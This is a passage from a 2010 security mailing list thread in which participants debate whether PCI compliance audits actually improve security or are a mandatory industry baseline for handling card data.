into whether it was into our best interest to use PCI. (it was decided that it wasn't worth the trouble) At that time, I knew about PCI but not its details, at which point we got someone to explain in detail for us. The end decision wasn't mine, though. We do take security as a main concern, however, it is preferred to have a more realistic approach to security rather then restrict employees' access (by signing some oath..). Regards, Christian Sciberras. On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) t...@hammerofgod.commailto:t...@hammerofgod.com wrote: Marketing propaganda? I have no idea what you are talking about. Before commenting on PCI not helping at all and at the most being a false sense of security, let me ask: 1) Does the company you work for perform PCI audits? 2) Is the company you work for required to undergo PCI audits? 3) Are you certified to be able to perform a PCI audit? 4) Have you ever been directly involved with, as in contributing to, a PCI audit, and if so, in what capacity? I would like to see some truthful expansion on the answers to those questions before continuing dialog about if PCI contributes to security or not. t From: Christian
Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds
Hmm. Point taken. Think I'm getting some sleep... G'night. On Sat, Apr 24, 2010 at 1:12 AM, Thor (Hammer of God) t...@hammerofgod.comwrote: You spend the time, resources, and money because you are contracted to. You are required to. You HAVE to. That’s what we’ve all been getting on about – you don’t get to choose, you have to if you want to continue to process credit card information yourself. If you want to use a gateway service or other processor, then fine – do that. No harm, no foul. You just pay more. If you want to do yourself, you have to be PCI certified. It’s just that simple. t *From:* Christian Sciberras [mailto:uuf6...@gmail.com] *Sent:* Friday, April 23, 2010 3:57 PM *To:* Thor (Hammer of God) *Cc:* Mike Hale; Stephen Mullins; full-disclosure; security-bas...@securityfocus.com *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds I just want to emphasize on a point you mentioned right now: It means companies illustrate a *base* of practices required to handle consumer credit card data. So why waste resources, time and money when one would be better off with proper security measures? As Mr Hale said, it's a piece of cake if you had the right stuff already going. Problem is, it's a piece of expensive cake. I just want[ed] to make my point clear, I don't see any discussion into this at all. As I already said, it is not my intention to argue with the original message. Cheers. On Sat, Apr 24, 2010 at 12:46 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: OK – so, when you say “to use PCI” what do you mean? I get the feeling that you are equating being “PCI certified” as something people just “get” to show other people they are “secure.” Hence your use of “marketing propaganda.” People don’t go through an audit and get PCI certified so that they can claim they are secure. It doesn’t work like that. PCI (Payment Card Industry) compliances is what people HAVE to do, as in FORCED to do whether they want to or not, in order to be able to process credit cards. If you process less than 1 million xactions per year, you can “self audit.” Can you lie? Sure. But you’ll get your ability to process payments yanked if they catch you. More than that requires an auditor. If that auditor finds you have horrible security controls in place, you will fail. If they pass you anyway, they can lose their certification to audit. If you fail, you have x time to get with the program and be audited again. It’s just a way for the CC industry to make sure the people handling card info follow best practices for security. That’s all it means – it is a certification FOR the industry BY the industry. No one ever said it mean people had “real security.” It means companies illustrate a base of practices required to handle consumer credit card data. That’s it. And I totally agree with Mike Hale’s comments about “if you are really secure, as in ‘already secure’ then it’s cake.” I don’t know that I would say “cake” as it depends on the scope of audit, but he’s right. If you already have a drive to secure your infrastructure, then PCI should be easy. My requirements for security are far more strict than PCI. Yours may or may not be, so you’ll have to adjust as necessary. Regarding code, I do believe that in PCI audits for dev that you have to illustrate an SDL, in which case things like XSS and BOs and such would be part of. That’s the skinny on PCI J t *From:* Christian Sciberras [mailto:uuf6...@gmail.com] *Sent:* Friday, April 23, 2010 3:34 PM *To:* Thor (Hammer of God) *Cc:* Mike Hale; Stephen Mullins; full-disclosure; security-bas...@securityfocus.com *Subject:* Re: [Full-disclosure] Compliance Is Wasted Money, Study Finds No problem with that. 1) No. 2) Planning to, but no. 3) Heavens no. 4) I've looked into whether it was into our best interest to use PCI. (it was decided that it wasn't worth the trouble) At that time, I knew about PCI but not its details, at which point we got someone to explain in detail for us. The end decision wasn't mine, though. We do take security as a main concern, however, it is preferred to have a more realistic approach to security rather then restrict employees' access (by signing some oath..). Regards, Christian Sciberras. On Sat, Apr 24, 2010 at 12:22 AM, Thor (Hammer of God) t...@hammerofgod.com wrote: Marketing propaganda? I have no idea what you are talking about. Before commenting on PCI not helping at all and at the most being a false sense of security, let me ask: 1) Does the company you work for perform PCI audits? 2) Is the company you work for required to undergo PCI audits? 3) Are you certified to be able to perform a PCI audit? 4) Have you ever been directly involved with, as in contributing to, a PCI audit, and if so, in what capacity? I would like to see
